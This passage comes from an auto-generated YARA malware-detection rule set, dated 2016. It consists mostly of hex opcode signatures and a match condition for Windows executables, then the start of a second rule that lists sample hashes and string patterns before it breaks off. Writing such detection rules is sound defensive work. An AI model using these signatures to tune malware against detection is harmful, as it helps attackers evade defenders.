$op537 = { 314300c78424500300000c314300c784 } /* Opcode */ $op538 = { 80184300c7842400010000a4184300c7 } /* Opcode */ $op539 = { ff7608a1a8794400ff50788bd8a1a879 } /* Opcode */ $op540 = { 
1c6a4300c78424e4 } /* Opcode */ $op541 = { a1a87944006850e5430053ff9090 } /* Opcode */ $op542 = { 595985c00f8551020000689c594300ff } /* Opcode */ $op543 = { 8bd80fb705b879440050a1a879440068 } /* Opcode */ $op544 = { 18684300c7842494 } /* Opcode */ $op545 = { 8975dc8975e08975f4ff90f8 } /* Opcode */ $op546 = { 595985c00f85c50200006828594300ff } /* Opcode */ $op547 = { e0ee4200c78424b4 } /* Opcode */ $op548 = { 4e914000a1cca04200898154030000c7 } /* Opcode */ $op549 = { a34300c784248c0b00000ca34300c784 } /* Opcode */ $op550 = { 5cae4300c78424b8 } /* Opcode */ $op551 = { 68345b4300ff7588a1a8794400ff9090 } /* Opcode */ $op552 = { 595985c00f85dd01000068245a4300ff } /* Opcode */ $op553 = { 595985c00f85ad030000688c544300ff } /* Opcode */ $op554 = { 83c424ff4e248b4624744f6a01c1e002 } /* Opcode */ $op555 = { 595985c00f859f06000068b0524300ff } /* Opcode */ $op556 = { 5f85c0740432c0c9c3568d45f850ff75 } /* Opcode */ $op557 = { 68feff0000ff75088944241ca1a87944 } /* Opcode */ $op558 = { 6a2f8d45b850ff757ca1a8794400c745 } /* Opcode */ $op559 = { 688c41430050a1a879440053ff905001 } /* Opcode */ $op560 = { 8c164300c784248c } /* Opcode */ $op561 = { ecef4200c78424f8 } /* Opcode */ $op562 = { 83c414381db17944007459a1a8794400 } /* Opcode */ $op563 = { ff75f88bf8ff750ca1a8794400687014 } /* Opcode */ $op564 = { 57ff751056ff909c02000053ff76088b } /* Opcode */ $op565 = { 595985c07536684c584300ff75b8a1a8 } /* Opcode */ $op566 = { 595985c00f85ff0200006848554300ff } /* Opcode */ $op567 = { d6224100c7811801 } /* Opcode */ $op568 = { 686a4300c78424ec } /* Opcode */ $op569 = { 8975b88975bcff900c03000085c00f85 } /* Opcode */ $op570 = { 568bd8a1a879440068d0b8410053ff90 } /* Opcode */ $op571 = { 8b0da8794400536689450aff91e8 } /* Opcode */ $op572 = { 6820b14200683cb142008bf0a1a87944 } /* Opcode */ $op573 = { 14b44200c78424bc } /* Opcode */ $op574 = { 595985c00f850e0600006810534300ff } /* Opcode */ $op575 = { 595985c074156a005750a1a879440056 } /* Opcode */ $op576 = { 08f04200c78424fc } /* Opcode */ 
$op577 = { a1a879440083c450ff75fc576864c743 } /* Opcode */ $op578 = { a46a4300c78424f8 } /* Opcode */ $op579 = { 8c3c4400c78424f8 } /* Opcode */ $op580 = { 8bf8a1a8794400684780000053ff90b8 } /* Opcode */ $op581 = { 595985c0757ba1a87944006830de4300 } /* Opcode */ $op582 = { 83c410894424108d4424245056ff7424 } /* Opcode */ $op583 = { 903b4400c78424a0 } /* Opcode */ $op584 = { bc3b4400c78424b4 } /* Opcode */ $op585 = { 8945fc8d474450ff7510a1a879440068 } /* Opcode */ $op586 = { 9c434400c78424fc } /* Opcode */ $op587 = { ff75108bf8a1a879440068dcb6420056 } /* Opcode */ $op588 = { 3c434400c78424e8 } /* Opcode */ $op589 = { 595985c0754da1a8794400687cde4300 } /* Opcode */ $op590 = { 6888574300ff75b8a1a8794400ff9090 } /* Opcode */ $op591 = { 94ef4200c78424e8 } /* Opcode */ $op592 = { 68b45b440050a1a879440053ff905001 } /* Opcode */ $op593 = { ff75106a00ff750ca1a8794400ff909c } /* Opcode */ $op594 = { ff75106a00ff750ca1a8794400ff909c } /* Opcode */ $op595 = { a1a879440083c450ff742418687c6343 } /* Opcode */ $op596 = { a43b4400c78424ac } /* Opcode */ $op597 = { 59164000c781a0010000bc2f4000a188 } /* Opcode */ $op598 = { 85c0754e50ff742414a1a8794400683c } /* Opcode */ $op599 = { a4174300c78424c4 } /* Opcode */ $op600 = { 30274300c784249c } /* Opcode */ $op601 = { 740ac705d479440006 } /* Opcode */ $op602 = { 595985c00f85a30100006878564300ff } /* Opcode */ $op603 = { 18ef4200c78424c8 } /* Opcode */ $op604 = { 84ef4200c78424e4 } /* Opcode */ $op605 = { dcb44200c7842400010000ecb44200c7 } /* Opcode */ $op606 = { 59598bd8ff74bd88a1a879440068d006 } /* Opcode */ $op607 = { 60184300c78424fc } /* Opcode */ $op608 = { 85c0752bff7510a1a8794400ff750cff } /* Opcode */ $op609 = { 8945f0668b45ec59668945ee598d45ec } /* Opcode */ $op610 = { 0f8252ffffffa1a879440053ff7508ff } /* Opcode */ $op611 = { ff7510a1a879440056ff907402000083 } /* Opcode */ $op612 = { 5c434400c78424f0 } /* Opcode */ $op613 = { 68545b4300ff7588a1a8794400ff9090 } /* Opcode */ $op614 = { 595985c00f85b7050000684c534300ff } /* 
Opcode */ $op615 = { a1a879440056536a0468f8a04200ff90 } /* Opcode */ $op616 = { 595985c00f85c50200006894554300ff } /* Opcode */ $op617 = { 59598945fc8b45f4484850ff75188b45 } /* Opcode */ $op618 = { 595985c00f851c0300006838554300ff } /* Opcode */ $op619 = { 83c41889458c837d8c000f8407040000 } /* Opcode */ $op620 = { 595985c00f851a010000a1a879440068 } /* Opcode */ $op621 = { 595985c00f85d40500006838534300ff } /* Opcode */ $op622 = { a1a87944006808624400ff75f856ff90 } /* Opcode */ $op623 = { c8f94200c78424ec } /* Opcode */ $op624 = { ff75f0a1a87944005368b4c8430068c8 } /* Opcode */ $op625 = { ff75eca1a879440068e8c7430056ff50 } /* Opcode */ $op626 = { 85c0754d8b450c668378023f50a1a879 } /* Opcode */ $op627 = { 66837938020f86d5 } /* Opcode */ $op628 = { ff75f4a1a8794400576820c84300682c } /* Opcode */ $op629 = { ff75d08b4df88b45ccff751403c10345 } /* Opcode */ $op630 = { 68805b4300ff7588a1a8794400ff9090 } /* Opcode */ $op631 = { 4c274300c78424a4 } /* Opcode */ $op632 = { a1a879440068e44443005653ff900801 } /* Opcode */ $op633 = { 58ef4200c78424d8 } /* Opcode */ $op634 = { 8d8500feffff689880430068ff } /* Opcode */ $op635 = { 595985c00f859003000068ac544300ff } /* Opcode */ $op636 = { 8b45fc8d048603433a50a1a8794400ff } /* Opcode */ $op637 = { 54684300c784249c } /* Opcode */ $op638 = { 68b0464300ff75088bf8a1a8794400ff } /* Opcode */ $op639 = { 643b4400c784248c } /* Opcode */ $op640 = { 894424608b44244883c04468cc7f4300 } /* Opcode */ $op641 = { 595985c00f859a0500006860534300ff } /* Opcode */ $op642 = { a1a879440053ff7508ff90b8 } /* Opcode */ $op643 = { 8b5d1085c07535a1a8794400538db8c4 } /* Opcode */ $op644 = { a1a879440056ff5028a1a87944006a13 } /* Opcode */ $op645 = { 2c3c4400c78424dc } /* Opcode */ $op646 = { 443c4400c78424e4 } /* Opcode */ $op647 = { 08ae4300c78424a4 } /* Opcode */ $op648 = { 94694300c78424d4 } /* Opcode */ $op649 = { 83c8ffe95c010000836508008d450850 } /* Opcode */ $op650 = { ff75fca1a87944006838b04200ff7514 } /* Opcode */ $op651 = { 
71324000c7814c0100006a6b4000a1d4 } /* Opcode */ $op652 = { 3c684300c7842498 } /* Opcode */ $op653 = { 595985c00f854c01000068a45a4300ff } /* Opcode */ $op654 = { c0ae4300c78424d0 } /* Opcode */ $op655 = { 703b4400c7842490 } /* Opcode */ $op656 = { 595985c07520a1a87944005753ff9060 } /* Opcode */ $op657 = { e43b4400c78424c4 } /* Opcode */ $op658 = { d4f84200c78424b8 } /* Opcode */ $op659 = { a18ca042008981bc020000a190a04200 } /* Opcode */ $op660 = { 64ee4200c7842498 } /* Opcode */ $op661 = { d4f94200c78424f0 } /* Opcode */ $op662 = { 8945f48d474450ff750ca1a879440068 } /* Opcode */ $op663 = { 8945f48d474450ff750ca1a879440068 } /* Opcode */ $op664 = { ff503c8d44242c894424588d842480 } /* Opcode */ $op665 = { 6cf84200c78424a0 } /* Opcode */ $op666 = { 68385c4300ff7588a1a8794400ff9090 } /* Opcode */ $op667 = { 595985c0745aa1a879440068feff0000 } /* Opcode */ $op668 = { 595985c0745aa1a879440068feff0000 } /* Opcode */ $op669 = { 24184300c78424f0 } /* Opcode */ $op670 = { 59598945bc8b45c0ff70108b45c083c0 } /* Opcode */ $op671 = { 8b45088b50183bca0f82270100008b40 } /* Opcode */ $op672 = { 10f84200c7842488 } /* Opcode */ $op673 = { ff75f4a1a8794400683f420f006864c8 } /* Opcode */ $op674 = { 8d45e450a1a8794400ff90f801000083 } /* Opcode */ $op675 = { 85c00f8420faffff5fff75f0a1a87944 } /* Opcode */ $op676 = { 30694300c78424c0 } /* Opcode */ $op677 = { 8d4300c7842440050000148d4300c784 } /* Opcode */ $op678 = { 6898584300ff75b8a1a8794400ff9090 } /* Opcode */ $op679 = { 8b5dfc3bde75053975f4747b33c03bde } /* Opcode */ $op680 = { 85c075158d45f850ffd68d45f850a1a8 } /* Opcode */ $op681 = { 595985c00f85de07000068e0514300ff } /* Opcode */ $op682 = { 0fb748486685c97e770fbfd13955f07f } /* Opcode */ $op683 = { 595985c00f85210400006858544300ff } /* Opcode */ $op684 = { 595985c00f855208000068b0514300ff } /* Opcode */ $op685 = { a0284300c7842400010000b0284300c7 } /* Opcode */ $op686 = { a4424400c78424d8 } /* Opcode */ $op687 = { 817c2414102700000f8fcc } /* Opcode */ $op688 = { 24ef4200c78424cc } 
/* Opcode */ $op689 = { 595985c00f85ab010000a1a879440068 } /* Opcode */ $op690 = { a194a04200898194 } /* Opcode */ $op691 = { 8cb34200c78424a0 } /* Opcode */ $op692 = { 8b5d088bf8a1a8794400688049430053 } /* Opcode */ $op693 = { 895c2464895c2468ff900c03000085c0 } /* Opcode */ $op694 = { 895c2464895c2468ff900c03000085c0 } /* Opcode */ $op695 = { ff75108b5d0c8bf8a1a879440053897d } /* Opcode */ $op696 = { 518db884020000ff907c0100005903c0 } /* Opcode */ $op697 = { 54b44200c78424d4 } /* Opcode */ $op698 = { 08284300c78424d8 } /* Opcode */ $op699 = { fbd94000c78110040000cb584100c781 } /* Opcode */ $op700 = { ccb44200c78424fc } /* Opcode */ $op701 = { 595985c0751d6870584300ff75b8a1a8 } /* Opcode */ $op702 = { 595985c00f85cf04000068e0534300ff } /* Opcode */ $op703 = { 578b7d088d45fe508b450cff34b0a1a8 } /* Opcode */ $op704 = { 595985c00f85fc010000a1a879440068 } /* Opcode */ $op705 = { 8944246c8b44244483c04450ff742450 } /* Opcode */ $op706 = { 595985c00f8583020000ff75e0a1a879 } /* Opcode */ $op707 = { 59598d44240850a1a8794400ff90a402 } /* Opcode */ $op708 = { 85c0753aa1a87944006a01683c3d4400 } /* Opcode */ $op709 = { 74b44200c78424dc } /* Opcode */ $op710 = { a8b34200c78424a4 } /* Opcode */ $op711 = { a1e0a04200898128040000a144a04200 } /* Opcode */ $op712 = { 60b44200c78424d8 } /* Opcode */ $op713 = { f4674300c784248c } /* Opcode */ $op714 = { 59598945d08d45d85068ff8f0000ff75 } /* Opcode */ $op715 = { 6814e34300ff75f88945cca1a8794400 } /* Opcode */ $op716 = { a1a879440083c450ff74240c681c6643 } /* Opcode */ $op717 = { 78f84200c78424a4 } /* Opcode */ $op718 = { 9c3c4400c7842400010000a83c4400c7 } /* Opcode */ $op719 = { 9c4300c784248c0900000c9c4300c784 } /* Opcode */ $op720 = { b4174300c78424cc } /* Opcode */ $op721 = { 6c3c4400c78424f0 } /* Opcode */ $op722 = { 894da4ff503c8d45dc8945bc8d459c50 } /* Opcode */ $op723 = { 78ef4200c78424e0 } /* Opcode */ $op724 = { 54b34200c7842494 } /* Opcode */ $op725 = { 8365fc0059598945f88b45fc8b9c8590 } /* Opcode */ $op726 = { 90284300c78424fc 
} /* Opcode */ $op727 = { c4684300c78424b0 } /* Opcode */ $op728 = { bcad4300c784248c } /* Opcode */ $op729 = { 0fb70db879440053516824e343005689 } /* Opcode */ $op730 = { 24b34200c784248c } /* Opcode */ $op731 = { 534c4100c781a8020000dd284100c781 } /* Opcode */ $op732 = { ff75f8a1a87944005768b4c0430068cc } /* Opcode */ $op733 = { 833dcc79440000750ac705cc7944009c } /* Opcode */ $op734 = { 344400c78424ec02000010344400c784 } /* Opcode */ $op735 = { 85c0753cff742424a1a879440068a82c } /* Opcode */ $op736 = { 1cb44200c78424c0 } /* Opcode */ $op737 = { 8d45e050ff75f4a1a8794400ff905402 } /* Opcode */ $op738 = { c43b4400c78424b8 } /* Opcode */ $op739 = { 595985c00f856506000068e0524300ff } /* Opcode */ $op740 = { ff76088bf88d460c50a1a879440057ff } /* Opcode */ $op741 = { 50a1a8794400ff500c84c0a1a8794400 } /* Opcode */ $op742 = { 595985c0754f68b05c4300ff7588a1a8 } /* Opcode */ $op743 = { 836508008365f8005959668b4e026649 } /* Opcode */ $op744 = { 8bf033c0668945dc8d7ddeab6a08ff75 } /* Opcode */ $op745 = { 904300c78424100600000c904300c784 } /* Opcode */ $op746 = { 595985c00f858206000068c8524300ff } /* Opcode */ $op747 = { 595985c07564a1a87944006858de4300 } /* Opcode */ $op748 = { 59598945e88365cc008365e40068feff } /* Opcode */ $op749 = { 85c074148d45d050a1a8794400ff90a4 } /* Opcode */ $op750 = { a1a8794400566800100000ff7508ff90 } /* Opcode */ $op751 = { 595985c00f85a8020000683c594300ff } /* Opcode */ $op752 = { 515350a1a879440057ff90bc0100008b } /* Opcode */ $op753 = { 374400c78424ac03000010374400c784 } /* Opcode */ $op754 = { 895ddc895de0ff90bc02000085c00f85 } /* Opcode */ $op755 = { 895ddc895de0ff90bc02000085c00f85 } /* Opcode */ $op756 = { 68b8094400ff75fcff91600100008b0d } /* Opcode */ $op757 = { 595985c0753668ec5b4300ff7588a1a8 } /* Opcode */ $op758 = { ff90840100005f85c0740432c0c9c38b } /* Opcode */ $op759 = { 84b44200c78424e4 } /* Opcode */ $op760 = { 595985c00f8578040000681c544300ff } /* Opcode */ $op761 = { 595985c00f85d9060000687c524300ff } /* Opcode */ $op762 = { 
a8ad4300c7842484 } /* Opcode */ $op763 = { 93364000c781640100006e984100a178 } /* Opcode */ $op764 = { 78284300c78424f8 } /* Opcode */ $op765 = { 8d8500feffff686c80430068ff } /* Opcode */ $op766 = { a1a879440083c44056ff90e4030000a1 } /* Opcode */ $op767 = { 83c41c894424146a01e99b0300008b44 } /* Opcode */ $op768 = { 2e4300c7842470020000102e4300c784 } /* Opcode */ $op769 = { a16ca04200c7411c1f4c41008981f8 } /* Opcode */ $op770 = { f0174300c78424dc } /* Opcode */ $op771 = { bc274300c78424c4 } /* Opcode */ $op772 = { 59598b45c0050010000050a1a8794400 } /* Opcode */ $op773 = { 595985c00f854c01000068f8564300ff } /* Opcode */ $op774 = { 8d44242450ff74241ca1a8794400ff90 } /* Opcode */ $op775 = { ff742434a1a879440068ac65430068bc } /* Opcode */ $op776 = { 964300c78424cc0700000c964300c784 } /* Opcode */ $op777 = { 33f6803d9379440000751aa1a8794400 } /* Opcode */ $op778 = { 595985c00f85fa0100006830564300ff } /* Opcode */ $op779 = { 8bf0a1a879440083c4108975fc85f675 } /* Opcode */ $op780 = { a1a8794400686ce5430053ff9090 } /* Opcode */ $op781 = { 59598d4de4515650538945f8895dfc53 } /* Opcode */ $op782 = { acae4300c78424cc } /* Opcode */ $op783 = { 48ee4200c7842490 } /* Opcode */ $op784 = { 0faf459c8d7008a1a879440056ff750c } /* Opcode */ $op785 = { 0cf94200c78424c4 } /* Opcode */ $op786 = { 894424188d474450ff750ca1a8794400 } /* Opcode */ $op787 = { 8b7d0ceb2550a1a8794400ff90e8 } /* Opcode */ $op788 = { 85c00f85e905000057bffeff0000eb02 } /* Opcode */ $op789 = { 595989463a85c074bc33ff8b46282bc7 } /* Opcode */ $op790 = { 8bf08b450c6683385c59598975f87516 } /* Opcode */ $op791 = { 8bf08b450c6683385c59598975f87516 } /* Opcode */ $op792 = { 595985c00f857d0500006870534300ff } /* Opcode */ $op793 = { 895de0895de4ff90bc0200008bf881ff } /* Opcode */ $op794 = { bc6a4300c7842400010000cc6a4300c7 } /* Opcode */ $op795 = { 84684300c78424a4 } /* Opcode */ $op796 = { 85c00f84b4feffffff75f8a1a8794400 } /* Opcode */ $op797 = { a1a87944006820de430053ff9090 } /* Opcode */ $op798 = { e0ad4300c7842494 } /* 
Opcode */ $op799 = { dcce4000c78130010000bd184000c781 } /* Opcode */ $op800 = { 595985c00f854d020000ff75d8a1a879 } /* Opcode */ $op801 = { 595985c00f85ca0300006880544300ff } /* Opcode */ $op802 = { 5933db5989442410895c2414be80 } /* Opcode */ $op803 = { 50a1a879440057689cc8430068acc843 } /* Opcode */ $op804 = { ff75fca1a8794400576848c74300685c } /* Opcode */ $op805 = { a1a879440068d45e440057ff90f40300 } /* Opcode */ $op806 = { a1a879440056ff9080020000a1a87944 } /* Opcode */ $op807 = { ff7424148bf0a1a879440056ff906003 } /* Opcode */ $op808 = { a1a879440083c4485753ff902c010000 } /* Opcode */ $op809 = { ff742420a1a8794400686866430053ff } /* Opcode */ $op810 = { fcb24200c7842484 } /* Opcode */ $op811 = { 834f28ff8367240059595e5b5fc9c355 } /* Opcode */ $op812 = { 64ae4300c78424bc } /* Opcode */ $op813 = { 50a1a8794400ff901c01000083c418a1 } /* Opcode */ $op814 = { ff75108bf8ff750ca1a879440068185f } /* Opcode */ $op815 = { 595985c00f8537010000a1a879440068 } /* Opcode */ $op816 = { e4264300c7842488 } /* Opcode */ $op817 = { ff45fc817dfc102700000f8ffe } /* Opcode */ $op818 = { 595985c00f85a802000068a4554300ff } /* Opcode */ $op819 = { a1a8794400683440430057ff90400100 } /* Opcode */ $op820 = { 595985c00f856e02000068d8554300ff } /* Opcode */ $op821 = { 568bf8a1a87944006a0057ff90780100 } /* Opcode */ $op822 = { a1a879440068f0464300ff7508ff902c } /* Opcode */ $op823 = { 595985c00f85c107000068f0514300ff } /* Opcode */ $op824 = { 85c00f8444ffffff32dbeb02b301a1a8 } /* Opcode */ $op825 = { 4c3b4400c7842484 } /* Opcode */ $op826 = { 8bf8a1a87944005653897dfcff90b8 } /* Opcode */ $op827 = { 0cef4200c78424c4 } /* Opcode */ $op828 = { 8cb44200c78424e8 } /* Opcode */ $op829 = { 59598d4c244c51575056894424248974 } /* Opcode */ $op830 = { a0684300c78424a8 } /* Opcode */ $op831 = { 10174300c78424a4 } /* Opcode */ $op832 = { a1a879440068fc5e440057ff90f40300 } /* Opcode */ $op833 = { ff742440a1a8794400680c634300681c } /* Opcode */ $op834 = { ff75f0a1a87944005368d0c8430068e0 } /* Opcode */ 
$op835 = { 8b46048b0d9c7944008988b4 } /* Opcode */ $op836 = { f8ad4300c784249c } /* Opcode */ $op837 = { 87194000c741487b614000c781b80300 } /* Opcode */ $op838 = { 50ae4300c78424b4 } /* Opcode */ $op839 = { 18af4300c78424f0 } /* Opcode */ $op840 = { ff75f8a1a87944005356ff5014ff75f8 } /* Opcode */ $op841 = { a8f84200c78424b0 } /* Opcode */ $op842 = { 8d45fc50a1a8794400ff90f801000083 } /* Opcode */ $op843 = { 8d45fc50a1a8794400ff90f801000083 } /* Opcode */ $op844 = { 595985c00f854806000068f0524300ff } /* Opcode */ $op845 = { a1a8794400685440430057ff90400100 } /* Opcode */ $op846 = { bbd03f00003bf36a010f8e9f } /* Opcode */ $op847 = { 85c07549a1a879440053ff74241868d8 } /* Opcode */ $op848 = { 68cc574300ff75b8a1a8794400ff9090 } /* Opcode */ $op849 = { 85c0754fa1a87944006a01ff74241c68 } /* Opcode */ $op850 = { 9c3b4400c78424a8 } /* Opcode */ $op851 = { ff742448a1a879440068e065430068e8 } /* Opcode */ $op852 = { 5cf84200c784249c } /* Opcode */ $op853 = { 6800080000ff75088945f0a1a8794400 } /* Opcode */ $op854 = { 595985c00f85a3010000684c5a4300ff } /* Opcode */ $op855 = { 88274300c78424b4 } /* Opcode */ $op856 = { 24f84200c7842490 } /* Opcode */ $op857 = { 85c00f84ddfeffffa1a87944005753ff } /* Opcode */ $op858 = { 8b55f80fb6120fb63f8b450803d75981 } /* Opcode */ $op859 = { 558beca1a879440083ec14538b5d0856 } /* Opcode */ $op860 = { 24174300c78424a8 } /* Opcode */ $op861 = { 8b75108b363bf30f8d92 } /* Opcode */ $op862 = { 595985c00f852b0600006800534300ff } /* Opcode */ $op863 = { 59598bf0a1a87944005668ff7f0000ff } /* Opcode */ $op864 = { ec3b4400c78424c8 } /* Opcode */ $op865 = { 689842430050a1a879440057ff905001 } /* Opcode */ $op866 = { c4694300c78424dc } /* Opcode */ $op867 = { 83c43885c00f85bb020000a1a8794400 } /* Opcode */ $op868 = { 18f84200c784248c } /* Opcode */ $op869 = { 0cb34200c7842488 } /* Opcode */ $op870 = { 6818494300ff75088bf8a1a8794400ff } /* Opcode */ $op871 = { e4b34200c78424b0 } /* Opcode */ $op872 = { ff7604a1a8794400ff75fc5368145d44 } /* Opcode */ $op873 = 
{ 85c074148d45f450a1a8794400ff90a4 } /* Opcode */ $op874 = { 668bd80fb70750a1a8794400ff90e8 } /* Opcode */ $op875 = { 668bd80fb70750a1a8794400ff90e8 } /* Opcode */ $op876 = { 83c410ff45fc8b45fc3b45f87caf5ba1 } /* Opcode */ $op877 = { 6683780a3a0f85b6 } /* Opcode */ $op878 = { 8bf8a1a879440083c41857c7071c0100 } /* Opcode */ $op879 = { b8f84200c78424b4 } /* Opcode */ $op880 = { 8944241833c066894424308d7c2432ab } /* Opcode */ $op881 = { a1a8794400ff742434681080430056ff } /* Opcode */ $op882 = { ff75fca1a8794400536888c743006898 } /* Opcode */ $op883 = { a1a879440056ff9008020000a1a87944 } /* Opcode */ $op884 = { 837d0c02598bf0598975f8750dff35c0 } /* Opcode */ $op885 = { 10fa4200c784240001000024fa4200c7 } /* Opcode */ $op886 = { 576800654400682865440056ff903c03 } /* Opcode */ $op887 = { 8975e88975ecff90f8 } /* Opcode */ $op888 = { 595985c00f8560050000687c534300ff } /* Opcode */ $op889 = { 595985c00f852f0100006820574300ff } /* Opcode */ $op890 = { 57ff75088945d8a1a8794400ff90b8 } /* Opcode */ $op891 = { 59598945f88b45fcff308b45fc83c004 } /* Opcode */ $op892 = { 59598945f88b45fcff308b45fc83c004 } /* Opcode */ $op893 = { 5733ff397d7c0f84f5010000a1a87944 } /* Opcode */ $op894 = { 681c5b4300ff7588a1a8794400ff9090 } /* Opcode */ $op895 = { 8b55148b1285d20f8c1f0100000fbf70 } /* Opcode */ $op896 = { 8946048b442418893083c40c8bc65ec3 } /* Opcode */ $op897 = { 595985c075368b45a44050ff7590ff75 } /* Opcode */ $op898 = { 344300c784243404000010344300c784 } /* Opcode */ $op899 = { 04694300c78424bc } /* Opcode */ $op900 = { 595985c00f851702000068f4594300ff } /* Opcode */ $op901 = { 836004008320005959c3558beca1a879 } /* Opcode */ $op902 = { 68c07344008945f0578d45f050a1a879 } /* Opcode */ $op903 = { 8b75fca1a87944006a0056ff506483c4 } /* Opcode */ $op904 = { 11654000c74164e7744000c741241a74 } /* Opcode */ $op905 = { 59593bc37478a1a879440068c0e54300 } /* Opcode */ $op906 = { 595985c00f85c8010000a1a879440068 } /* Opcode */ $op907 = { 68745c4300ff7588a1a8794400ff9090 } /* Opcode */ $op908 = { 
595985c00f856f08000068a4514300ff } /* Opcode */ $op909 = { 595985c00f8517020000681c564300ff } /* Opcode */ $op910 = { ff35c87944008bf8a1a8794400688477 } /* Opcode */ $op911 = { a0274300c78424bc } /* Opcode */ $op912 = { 44174300c78424b0 } /* Opcode */ $op913 = { 98174300c78424c0 } /* Opcode */ $op914 = { 686c5b4300ff7588a1a8794400ff9090 } /* Opcode */ $op915 = { 687c584300ff75b8a1a8794400ff9090 } /* Opcode */ $op916 = { ff4424108d474450a1a8794400ff9098 } /* Opcode */ $op917 = { ec164300c78424a0 } /* Opcode */ $op918 = { 4c434400c78424ec } /* Opcode */ $op919 = { 8b75108b363bf20f8dd5 } /* Opcode */ $op920 = { 6834484300ff75088bf8a1a8794400ff } /* Opcode */ $op921 = { 85c0753cff74242ca1a8794400683038 } /* Opcode */ $op922 = { 1d4300c78424e00100000c1d4300c784 } /* Opcode */ $op923 = { a1a87944006860e5430053ff9090 } /* Opcode */ $op924 = { f8684300c78424b8 } /* Opcode */ $op925 = { 595981ffd03f00008945f889380f8eb0 } /* Opcode */ $op926 = { fcf74200c7842484 } /* Opcode */ $op927 = { fec3660fb6c35959663b450c750232db } /* Opcode */ $op928 = { 836424200089442428a100b042005959 } /* Opcode */ $op929 = { 50a1a87944005668d06643005653ff90 } /* Opcode */ $op930 = { 8b45f40145f02945ec83c40cff45fc8b } /* Opcode */ $op931 = { 83c42c85c00f852e030000ff75100fb7 } /* Opcode */ $op932 = { 6c694300c78424d0 } /* Opcode */ $op933 = { 595985c00f857303000068d8544300ff } /* Opcode */ $op934 = { 9cf84200c78424ac } /* Opcode */ $op935 = { a8164300c7842494 } /* Opcode */ $op936 = { ff45fc817dfce80300000f8fac } /* Opcode */ $op937 = { e9adfeffffa1a87944006a006affff90 } /* Opcode */ $op938 = { 33c0668944242c8d7c242eab66ab6810 } /* Opcode */ $op939 = { fc414400c78424c0 } /* Opcode */ $op940 = { a1a879440083c450ff75f85768e8c043 } /* Opcode */ $op941 = { 59881daf794400ff0500b04200381daf } /* Opcode */ $op942 = { d4ee4200c78424b0 } /* Opcode */ $op943 = { 203c4400c78424d8 } /* Opcode */ condition: ( uint16(0) == 0x5a4d and filesize < 900KB and ( 5 of ($s*) )and 1 of ($op*) ) or ( all of them ) } rule 
_370c433dd61ec21d2677cfe02ef93a5f32a2b50d_5bf48d77bade79f2421ae3d258fe8262c043fb8f_08bdf374b28b234e824797145206f4df79eac6ea_1 { meta: description = "Auto-generated rule - from files 370c433dd61ec21d2677cfe02ef93a5f32a2b50d.codex, 5bf48d77bade79f2421ae3d258fe8262c043fb8f.codex, 08bdf374b28b234e824797145206f4df79eac6ea.codex" author = "YarGen Rule Generator" reference = "not set" date = "2016-07-21" super_rule = 1 hash1 = "29b4498ac81d654b52cd0a32bdf29ed955f046ef9db1e0eba7da47ab2f950a3e" hash2 = "84ab50a9e325f64a54d84fb6798d8e74f46c21fd8b935d6c47a44bb140effad9" hash3 = "3f326fb6a79842c657efa09b71ce5e46dc110dd324bfabfcd32730d86de0bcf5" strings: $s1 = ":$:+:2:9:@:G:N:U:\\:s:" fullword ascii $s2 = "6%6+606<6H6M6\\6b6g6v6}6" fullword ascii $s3 = "8\"8,818;8@8J8O8Y8^8h8m8w8" fullword ascii $s4 = "6 6'6.656<6C6J6Q6X6_6f6m6t6" fullword ascii $s5 = "4\"4)40474>4E4L4S4Z4a4h4" fullword ascii $s6 = "9\"9+91969?9E9J9S9\\9a9j9p9u9~9" fullword ascii $s7 = "9\"9'91999C9H9R9W9a9f9p9u9" fullword ascii $s8 = "4\"4(4-4<4B4G4S4_4d4s4y4~4" fullword ascii $s9 = "6\"6'6,6=6B6G6X6]6b6o6{6" fullword ascii $s10 = "?\"?/?4?B?G?L?Y?^?k?p?}?" fullword ascii $s11 = "3)31383>3C3L3R3W3c3i3n3w3}3" fullword ascii $s12 = ";&;+;5;:;D;I;S;X;b;j;t;y;" fullword ascii $s13 = "='=,=6=>=H=M=W=\\=a=m=r=w=" fullword ascii $s14 = ":!:*:/:9:>:H:P:Z:_:i:n:x:}:" fullword ascii $s15 = "3$3.383B3L3S3Z3a3h3o3v3}3" fullword ascii $s16 = "<$<.<3<=<B<L<Q<^<c<m<r<|<" fullword ascii $s17 = "31383?3F3M3T3[3b3i3p3w3~3" fullword ascii $s18 = "?*?1?8???F?M?T?[?b?i?p?w?" 
fullword ascii $s19 = "9!9(9/969=9D9K9R9Y9`9g9n9x9" fullword ascii $s20 = ":$:*:/:8:>:C:L:U:Z:c:i:n:w:|:" fullword ascii $op0 = { fc014300c78424f0 } /* Opcode */ $op1 = { a1d860440068d0cd430053ff90200300 } /* Opcode */ $op2 = { c7819c0300000ca64000c78124030000 } /* Opcode */ $op3 = { 59395df8759d8d45fc505353538d45a8 } /* Opcode */ $op4 = { 663bd875438bc62b450c8945fceb038b } /* Opcode */ $op5 = { 895de4895de8ff901404000085c07d07 } /* Opcode */ $op6 = { c82a4400c78424c8 } /* Opcode */ $op7 = { 6c514300c7842498 } /* Opcode */ $op8 = { d8014300c78424e0 } /* Opcode */ $op9 = { 84a44200c78424e4 } /* Opcode */ $op10 = { 59598b460485c0741250ff74240ca1d8 } /* Opcode */ $op11 = { 33db83c4203bfb0f84a0 } /* Opcode */ $op12 = { 83c4188945fc837dfc000f848f } /* Opcode */ $op13 = { 74294400c784249c } /* Opcode */ $op14 = { 04024300c78424f4 } /* Opcode */ $op15 = { 50974300c78424d0 } /* Opcode */ $op16 = { 68feff0000ff7508ff90040200008945 } /* Opcode */ $op17 = { 59ff75eca1d8604400680cb1430056ff } /* Opcode */ $op18 = { 59385d0c0f844e010000535357575756 } /* Opcode */ $op19 = { ecdd4200c78424d4 } /* Opcode */ $op20 = { a1d86044008d5f106894c6430053ff90 } /* Opcode */ $op21 = { bf300e440057894df0ff904002000059 } /* Opcode */ $op22 = { 24244400c78424ac } /* Opcode */ $op23 = { ff90a80300003d220000c00f8586 } /* Opcode */ $op24 = { a1d860440057ff7508ff909001000033 } /* Opcode */ $op25 = { 598d45b450a1d8604400ff90e0030000 } /* Opcode */ $op26 = { a1d86044005653ff742424ff90d40300 } /* Opcode */ $op27 = { 0cdd4200c7842498 } /* Opcode */ $op28 = { 8975ec8975f0ff90a8030000f7d81bc0 } /* Opcode */ $op29 = { 88114300c78424c4 } /* Opcode */ $op30 = { 18244400c78424a4 } /* Opcode */ $op31 = { 3cdd4200c78424a0 } /* Opcode */ $op32 = { 83c40c894590ff75a4ff75ac8b4590ff } /* Opcode */ $op33 = 